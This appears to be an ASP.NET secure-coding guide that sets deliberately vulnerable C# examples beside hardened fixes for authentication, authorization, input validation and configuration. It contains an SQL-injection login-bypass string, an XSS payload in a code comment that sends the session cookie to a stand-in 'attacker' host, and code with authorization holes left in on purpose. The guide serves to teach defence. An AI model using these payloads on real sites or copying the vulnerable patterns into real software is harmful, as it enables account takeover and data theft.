There is a wide array of attacks that ASP.NET web
applications need to protect against, but most security holes are due to flaws
in one of the following four areas:
Authentication
Making it easy for attackers to learn
users' credentials, or worse, to circumvent the application's authentication
altogether.
Possible deficiencies:
lack of a password policy (strong passwords, expiration, account lockout etc.),
returning internal error messages to the browser (for example, telling the
attacker whether it was the user name or the password that was wrong), using
dynamic SQL on the login page (SQL injection), using cookies and other insecure
means to store users' credentials, and passing user names and passwords in
clear text.
Possible attacks:
network eavesdropping, brute force and dictionary attacks, SQL injection (on
the login page), cookie replay attacks and credential theft.
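The login check written two ways, as an added example that is not code from the original article. It assumes a hypothetical Users table with UserName, PasswordHash and PasswordSalt columns; the first method is the deliberately vulnerable dynamic-SQL version, the second uses a parameterised query, a salted PBKDF2 hash and a constant-time comparison, and issues a forms-authentication ticket instead of storing the credentials in a cookie.

```csharp
// Added example (not from the original article). Assumed schema:
//   Users(UserName NVARCHAR(256), PasswordHash VARBINARY(32), PasswordSalt VARBINARY(16))
using System;
using System.Data;
using System.Data.SqlClient;
using System.Security.Cryptography;
using System.Web.Security;

public static class LoginService
{
    // VULNERABLE: SQL built from user input and a clear-text password column.
    // A user name of   ' OR 1=1 --   makes the WHERE clause always true and bypasses the check.
    public static bool LoginVulnerable(string connectionString, string userName, string password)
    {
        string sql = "SELECT COUNT(*) FROM Users WHERE UserName = '" + userName +
                     "' AND Password = '" + password + "'";
        using (var conn = new SqlConnection(connectionString))
        using (var cmd = new SqlCommand(sql, conn))
        {
            conn.Open();
            return (int)cmd.ExecuteScalar() > 0;
        }
    }

    // HARDENED: parameterised lookup, salted PBKDF2 hash compared in constant time,
    // and a single "yes/no" result that does not reveal which part was wrong.
    public static bool LoginHardened(string connectionString, string userName, string password)
    {
        const string sql = "SELECT PasswordHash, PasswordSalt FROM Users WHERE UserName = @user";
        byte[] storedHash = null, salt = null;
        using (var conn = new SqlConnection(connectionString))
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@user", SqlDbType.NVarChar, 256).Value = userName;
            conn.Open();
            using (SqlDataReader r = cmd.ExecuteReader())
            {
                if (r.Read())
                {
                    storedHash = (byte[])r["PasswordHash"];
                    salt = (byte[])r["PasswordSalt"];
                }
            }
        }
        // Unknown user: still compute a hash so the response time does not reveal
        // whether the user name exists (a dummy salt/hash can never match).
        if (storedHash == null) { salt = new byte[16]; storedHash = new byte[32]; }
        byte[] candidate = HashPassword(password, salt);
        return FixedTimeEquals(storedHash, candidate);
    }

    // PBKDF2 (Rfc2898DeriveBytes is HMAC-SHA1 based in the .NET Framework); 32-byte output.
    public static byte[] HashPassword(string password, byte[] salt)
    {
        using (var kdf = new Rfc2898DeriveBytes(password, salt, 100000))
            return kdf.GetBytes(32);
    }

    // Fresh random salt for a newly created or changed password.
    public static byte[] NewSalt()
    {
        var salt = new byte[16];
        using (var rng = new RNGCryptoServiceProvider()) rng.GetBytes(salt);
        return salt;
    }

    // Compares every byte regardless of where the first mismatch is.
    static bool FixedTimeEquals(byte[] a, byte[] b)
    {
        int diff = a.Length ^ b.Length;
        for (int i = 0; i < a.Length && i < b.Length; i++) diff |= a[i] ^ b[i];
        return diff == 0;
    }

    // On success, let forms authentication issue its signed ticket cookie; never write
    // the user name or password into a cookie of your own.
    public static void OnLoginSuccess(string userName)
    {
        FormsAuthentication.RedirectFromLoginPage(userName, false /* not persistent */);
    }
}
```

The hardened path still needs transport protection: the login page must be served over HTTPS, and the forms-authentication cookie should be marked requireSSL in web.config so the ticket is never sent in clear text, which is what the network eavesdropping and cookie replay attacks above rely on.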
Authorization
Allowing logged-in users to perform actions
without verifying that they are entitled to (vertical and horizontal privilege
escalation).
Possible deficiencies:
inconsistent authorization checks across requests and pages (checking on the
page that links to a resource but not on the page that serves it), lack of data
validation, and trusting data submitted by the user to decide what they may do
(cookies, hidden fields, URL parameters etc.).
Possible attacks:
privilege escalation (horizontal and vertical), disclosure of confidential
data and data tampering.
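The same "view account" operation with and without authorization checks, as an added example that is not code from the original article. The account data is a constructed in-memory stand-in for a database; the vulnerable method trusts a query-string id and a hidden isAdmin form field, the hardened one takes identity and roles from the server-side IPrincipal that forms authentication and the role provider populate.

```csharp
// Added example (not from the original article). Accounts and user names are constructed
// sample data; Admin is an assumed role name.
using System;
using System.Collections.Generic;
using System.Security.Principal;
using System.Web;

public class Account
{
    public int Id;
    public string OwnerUserName;
    public decimal Balance;
}

public static class AccountService
{
    static readonly Dictionary<int, Account> Accounts = new Dictionary<int, Account>
    {
        { 1001, new Account { Id = 1001, OwnerUserName = "alice", Balance = 250m } },
        { 1002, new Account { Id = 1002, OwnerUserName = "bob",   Balance = 9000m } },
    };

    // VULNERABLE. Horizontal escalation: any logged-in user who edits ?accountId=1001 to
    // 1002 reads Bob's balance, because ownership is never checked. Vertical escalation:
    // a hidden form field is trusted as if it were a role assignment.
    public static Account GetAccountVulnerable(HttpRequest request)
    {
        int id = int.Parse(request.QueryString["accountId"]);
        bool isAdmin = request.Form["isAdmin"] == "true";
        Account acct = Accounts[id];
        if (isAdmin) acct.Balance = decimal.Parse(request.Form["newBalance"]);
        return acct;
    }

    // HARDENED: the check runs inside the operation, on every request, and uses only
    // server-side identity and roles. "Not found" and "not yours" give the same response
    // so the id space cannot be enumerated.
    public static Account GetAccountHardened(IPrincipal user, string accountIdParam)
    {
        if (user == null || !user.Identity.IsAuthenticated)
            throw new UnauthorizedAccessException("login required");

        int id;
        if (!int.TryParse(accountIdParam, out id))        // validate type before use
            throw new ArgumentException("bad accountId");

        Account acct;
        if (!Accounts.TryGetValue(id, out acct))
            throw new UnauthorizedAccessException("not found");

        bool isOwner = string.Equals(acct.OwnerUserName, user.Identity.Name,
                                     StringComparison.OrdinalIgnoreCase);
        if (!isOwner && !user.IsInRole("Admin"))
            throw new UnauthorizedAccessException("not found");
        return acct;
    }

    // Privileged operation: the role check lives here, so requesting the handler
    // directly (skipping the admin menu page) does not bypass it.
    public static void SetBalance(IPrincipal user, int accountId, decimal newBalance)
    {
        if (user == null || !user.IsInRole("Admin"))
            throw new UnauthorizedAccessException("admin only");
        Accounts[accountId].Balance = newBalance;
    }
}
```

From a page or handler the call is `AccountService.GetAccountHardened(HttpContext.Current.User, Request.QueryString["accountId"])`. Page-level `<authorization>` rules in web.config keep anonymous users away from whole directories, but they cannot express "this record belongs to this user", so the ownership check has to be in code on every request that touches the record.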
Data Validation
Trusting data submitted by the user and
acting upon it without checking it.
Possible deficiencies:
lack of consistent and strict validation of all input throughout the web
application, and failing to encode data before sending it to the browser.
Common attacks:
cross-site scripting (XSS), SQL injection, data tampering (query string, form
fields, cookies and HTTP headers), embedded malicious characters and HTTP
response splitting.
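Whitelist validation, context-specific output encoding and a guarded redirect target, as an added example that is not code from the original article. The name pattern and the /profile.aspx URL are assumptions; parameterised queries (the usual fix for the SQL injection item) are not repeated here.

```csharp
// Added example (not from the original article). NamePattern and the profile URL are
// illustrative assumptions.
using System;
using System.Text.RegularExpressions;
using System.Web;

public static class SafeOutput
{
    // VULNERABLE: a raw query-string value written into the page. With
    // ?name=<script>document.location='http://attacker/?c='+document.cookie</script>
    // the script runs in the victim's browser and leaks the session cookie.
    public static string GreetingVulnerable(string rawName)
    {
        return "<p>Hello " + rawName + "</p>";
    }

    // Whitelist: letters, spaces, apostrophes and hyphens, 1 to 50 characters.
    static readonly Regex NamePattern =
        new Regex(@"^[\p{L}][\p{L} '\-]{0,49}$", RegexOptions.Compiled);

    // HARDENED: reject anything outside the whitelist (do not try to "clean" it),
    // then HTML-encode for the HTML body context it is written into.
    public static string GreetingHardened(string rawName)
    {
        if (rawName == null || !NamePattern.IsMatch(rawName))
            throw new ArgumentException("invalid name");
        return "<p>Hello " + HttpUtility.HtmlEncode(rawName) + "</p>";
    }

    // Encoding is context-specific: an attribute value and a URL parameter need
    // different encoders, and one value may need both in the same line of markup.
    public static string ProfileLink(string userName)
    {
        return "<a title=\"" + HttpUtility.HtmlAttributeEncode(userName)
             + "\" href=\"/profile.aspx?u=" + HttpUtility.UrlEncode(userName)
             + "\">profile</a>";
    }

    // HTTP response splitting: a CR/LF in a value copied into the Location header lets
    // the attacker append headers or a whole second response. ASP.NET rejects CR/LF in
    // header values when httpRuntime enableHeaderChecking="true" (the default), but the
    // value should still be restricted to a local path so it cannot become an open redirect.
    public static string SafeReturnUrl(string rawReturnUrl)
    {
        if (string.IsNullOrEmpty(rawReturnUrl)) return "/";
        if (rawReturnUrl.IndexOfAny(new[] { '\r', '\n' }) >= 0) return "/";
        // Must start with a single '/'; "//host" and "/\host" are protocol-relative.
        bool local = rawReturnUrl[0] == '/'
                  && (rawReturnUrl.Length == 1
                      || (rawReturnUrl[1] != '/' && rawReturnUrl[1] != '\\'));
        return local ? rawReturnUrl : "/";
    }
}
```

Validate on the server even when the page has client-side validators: the ASP.NET validation controls are a convenience for the user, and an attacker posts the form fields directly without ever running them. The same rule covers cookies and HTTP headers, which are just more user-controlled input.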
Application Configuration
Running the application and its host server with
their default configuration.
Possible deficiencies:
granting the application more permissions than it actually needs, failing to
properly secure the resources it depends on (operating system, database etc.),
and passing internal application information back to the browser (internal
messages, unhandled exception details and trace output).
Common attacks:
unauthorized access to administrative functionality, unauthorized access to
configuration information, retrieval of clear-text configuration information
(such as connection strings) and unauthorized access to data stores.
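A start-up audit of the web.config settings that leak internal information or weaken cookies, plus encryption of the connectionStrings section so it is not stored in clear text, as an added example that is not code from the original article. It uses the System.Web.Configuration section classes; the Global.asax wiring shown in the comment is an assumption about where it would be called.

```csharp
// Added example (not from the original article). Intended to be called from
// Application_Start in Global.asax (assumed); finding texts are this example's own.
using System;
using System.Collections.Generic;
using System.Configuration;
using System.Web.Configuration;

public static class ConfigAudit
{
    // Returns one finding per weak setting; an empty list means the checked settings are sane.
    public static List<string> Audit(Configuration config)
    {
        var findings = new List<string>();

        var compilation = (CompilationSection)config.GetSection("system.web/compilation");
        if (compilation != null && compilation.Debug)
            findings.Add("compilation debug=\"true\": stack traces and source lines reach the browser");

        var errors = (CustomErrorsSection)config.GetSection("system.web/customErrors");
        if (errors == null || errors.Mode == CustomErrorsMode.Off)
            findings.Add("customErrors mode=\"Off\": unhandled exception detail is sent to remote clients");

        var trace = (TraceSection)config.GetSection("system.web/trace");
        if (trace != null && trace.Enabled && !trace.LocalOnly)
            findings.Add("trace enabled and not localOnly: Trace.axd exposes request and session data remotely");

        var cookies = (HttpCookiesSection)config.GetSection("system.web/httpCookies");
        if (cookies == null || !cookies.HttpOnlyCookies)
            findings.Add("httpCookies httpOnlyCookies=\"false\": auth/session cookies readable by script");
        if (cookies == null || !cookies.RequireSSL)
            findings.Add("httpCookies requireSSL=\"false\": cookies are sent over plain HTTP");

        if (!config.ConnectionStrings.SectionInformation.IsProtected)
            findings.Add("connectionStrings stored in clear text");

        return findings;
    }

    // Encrypts <connectionStrings> in place with DPAPI so the file no longer holds
    // clear-text database credentials. Equivalent to:
    //   aspnet_regiis -pe "connectionStrings" -app "/MyApp"
    public static void ProtectConnectionStrings(Configuration config)
    {
        ConfigurationSection section = config.ConnectionStrings;
        if (!section.SectionInformation.IsProtected)
        {
            section.SectionInformation.ProtectSection("DataProtectionConfigurationProvider");
            config.Save(ConfigurationSaveMode.Modified);
        }
    }

    // Global.asax (assumed placement):
    // void Application_Start(object sender, EventArgs e)
    // {
    //     Configuration cfg = WebConfigurationManager.OpenWebConfiguration("~");
    //     foreach (string f in ConfigAudit.Audit(cfg))
    //         System.Diagnostics.Trace.TraceWarning(f);
    // }
}
```

ProtectConnectionStrings writes to web.config, so the application pool identity needs write access to the file for that one step; the audit itself only reads. Encrypting the section closes the "retrieval of clear-text configuration information" attack, but the other half of least privilege is outside web.config: the account named in the connection string should have only the table and procedure rights the application uses, never db_owner or sa.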